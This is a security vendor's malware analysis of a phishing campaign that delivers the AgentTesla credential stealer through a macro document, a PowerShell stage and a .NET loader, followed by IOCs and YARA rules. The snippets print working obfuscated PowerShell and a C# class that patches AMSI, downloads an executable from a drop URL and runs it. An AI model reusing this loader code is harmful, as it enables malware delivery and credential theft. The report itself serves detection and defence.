Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Introduction

Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

Hash72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
ThreatMacro Dropper
Brief DescriptionAgent Tesla Doc Macro Dropper
Ssdeep768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document

Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

powershell -WindowStyle Hidden 
function b72f3 {    param($l74b5)    $l557ad = 'bc9b4';$l63acc = '';    for ($i = 0; $i -lt $l74b5.length; $i+=2) {        $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16);        $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]);        }    return $l63acc;}
$k61b35e = '1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b5703425e19175053570c531c00540b04074a410951040757585256530209540404560c401d4b5850041c07065f5001555e042b5a16334d101a38064b0d1d190456165b420f0b57010158442b5a16334d10140000585455035e4f030054020e4a5107050b57034e010e5052514b1b500752060d030400550e520552510c5506525708520052560c01055241104b0f0b0511005703555803095f2a5716641611173851100c1019530d1756425850560c010f1f36700c4032174b425007555f51094a36700c4032174b4b015916500c4042070c0102535e09595d044b180f0d5b5b0b010c4a015a0302030215065154050a4e041a57094e5b17171906010155084b1d190456165b420f0b5701015844204d1606623f140752005552005b0419041a50084e041a055f4e041a5a091f0f2b0d4d32401043520751515a585f7903114a0a550e4d780e580d007125580d01580e1c514a022f5510105103584c2056124d4a06085b030401014e044e085c07075b0215511d59095a04565051110c511543700c4032174b4a5601020f03554c37562b5a16550d4a1d49534152045301104e5f07060a5b554e5010595850560c010e42345c00770e0a5c0c4042115d53075a5a040c5115436e0756210f50075a164b1059471611500c53421a5b0755555a04275a140a4b0d5a0f0657161a25064d245b0e075c10640317514a710c1550105b0c0e5c0c404c304907570b0255245b0e075c101a2313490e5d01024d0b5b0c275816554b481b3e681a50585a05034112000350050a4a16560009540053530e401d59115d53075a5a17265b150d550d550625500e514a010e5052514b1b525553540d060550535c565056000d070557570a565752010c5a04015609530453550d0304035258520552000c560006570a530656060c0304065658530252550c550554525b530652050d010457565d5257535308540451565f525653530c5604555709565053560c520455570a530556000e060555570f500152010c5a0404550d5250535008550455575a5203404a151b5607020e5b1d59334b0d5707104a314003114d2b5a040c190c0150005c04515f0d5c1514321156015111106a16551017700c520d4b4000510354004b0f3211560151111017314003114d4a5a57515a0752074a02105116164b0c145258441241000f500114111758165d01434a16460b0d5e425655515f511c11174b0b5a05434a53525557584b4f11174b0b5a054358040055575b570940015a5b565641021140100a5705141707085601535e6a16460b0d5e4c710f134d1b0f040c4b4a5d0c17190b095258505e4753050e56554c2f5c0c53160b020b1f5f511019561b175c424203570f03035f20560c4207114d4c600d214016514a10080403560217314100104d105d0c04110b18504a1553024b584c060556560849094a005103464b4b4f030054020e426a42025f560356010c391c0b4c0b4b14474358040055575b571a2e065705400a3e10594910064d17460c434c060556560859491f';$k61b35e2 = b72f3($k61b35e);
Add-Type -TypeDefinition $k61b35e2;[p99a3fb]::o81f67();

Code Snippet 1

The Powershell stage is substantially composed of three parts: the first is the declaration of  function “b72f3()”, having the purpose to deobfuscate the second part of the script, contained into the “$k61b35e” variable. It actually is a C# source code snippet, compiled and loaded within the Powershell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just compiled “p99a3fb” class.

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;

public class p99a3fb{ 
 [DllImport("kernel32",EntryPoint="GetProcAddress")] 

 public static extern IntPtr va46a7(IntPtr af474b5,string a2457);
 [DllImport("kernel32", EntryPoint = "LoadLibrary")] public static extern IntPtr ud1451(string j4d4b5);
 [DllImport("kernel32", EntryPoint="VirtualProtect")] public static extern bool m9982c8(IntPtr sfff854,UIntPtr j5236a, uint r427a, out uint m8a94);
 [DllImport("Kernel32.dll", EntryPoint="RtlMoveMemory", SetLastError=false)] static extern void jcfb22(IntPtr mf1b8,IntPtr dcad15,int k456b);
 
 public static int o81f67(){ 
	IntPtr eef257 = ud1451(b72f3("030e4a0b1a060f55"));
	if(eef257==IntPtr.Zero){goto l255c;} 
	IntPtr bca6aa=va46a7(eef257,b72f3("230e4a0b67010257204104055c10")); 	
 	if(bca6aa==IntPtr.Zero){goto l255c;} 
	UIntPtr de6f3=(UIntPtr)5;
 	uint d5c61=0;
 	if(!m9982c8(bca6aa,de6f3,0x40,out d5c61)){goto l255c;}
  	Byte[] e197fb8={0x31,0xff,0x90};
	 IntPtr kee39a=Marshal.AllocHGlobal(3);
	 Marshal.Copy(e197fb8,0,kee39a,3);
	 jcfb22(new IntPtr(bca6aa.ToInt64()+0x001b),kee39a,3);
	 l255c:  WebClient rd1389=new WebClient();
	 string ybea79=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+"\\x3a81a"+b72f3("4c064107");
	rd1389.DownloadFile(b72f3("0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07"),ybea79);
	 ProcessStartInfo n52cefe=new ProcessStartInfo(ybea79);
	 Process.Start(n52cefe);
	 return 0;
 } 

 public static string b72f3(string s1f74a){ 
	string af474b5="bc9b4";
	string ud1451=String.Empty;
	 for(int i=0;
	i<s1f74a.Length;
	i+=2){ 
	byte va46a7=Convert.ToByte(s1f74a.Substring(i,2),16);
		 ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
 	} return ud1451;
 }
}

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

Hash51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
ThreatAgent Tesla Loader
Brief DescriptionAgent Tesla .NET C# loader
Ssdeep12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate “creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind“. This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the “swety.dll” library, the module in charge to detect the analysis environment.

The “Swety” Module

Hasha0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
ThreatSwety evasion module
Brief Description.NET Swety evasion module
Ssdeep1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
ThreatAgent Tesla
Brief DescriptionAgent Tesla Payload
Ssdeep6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick

Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “chevyview450@gmail.com”. 

Figure 12: SMPT communication

Conclusion

As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these “commodity tools” still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Indicators of Compromise

Hashes

  • 6b3bec68b760ac3f3f1b8a4668ac4bccde262ecdf1dc93a5329fa58eefdfb47b
  • 51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
  • a0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0

DropUrl:

  • hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe

C2 (smtp)

  • chevyview[@gmail[.com

Persistence Mechanism

  • Setting of the registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”

Yara Rules

rule AgentTesla_MacroDropper_1909 {
    meta:
      description = "Yara rule for AgentTesla Macro DOC Dropper 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 6D EF 0D 0F 32 2A A4 A0 8D 0A}
	  $a2 = {7B D6 CB 41 C7 28 48 4D ED A5}
	  $a3 = {5F AF B6 16 6C A9 3A 0C 5F D8 5C}
    condition:
      uint16(0) == 0x4B50 and all of them
}
rule AgentTesla_loader_1909 {
    meta:
      description = "Yara rule for AgentTesla loader 1909"
      author = "Yoroi - ZLab"
      last_updated = "2019-09-17"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {3D D2 5B 5B 7B 9B EF 4C BB}
	  $a2 = {8E AF 2D D0 BD 78 5C D1 15}
	  $a3 = "F7yYSv5wCAK/4YCGT+bQ==" ascii wide
    condition:
      uint16(0) == 0x5A4D and pe.timestamp == 0x25E8088E and all of them

}

This article was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB.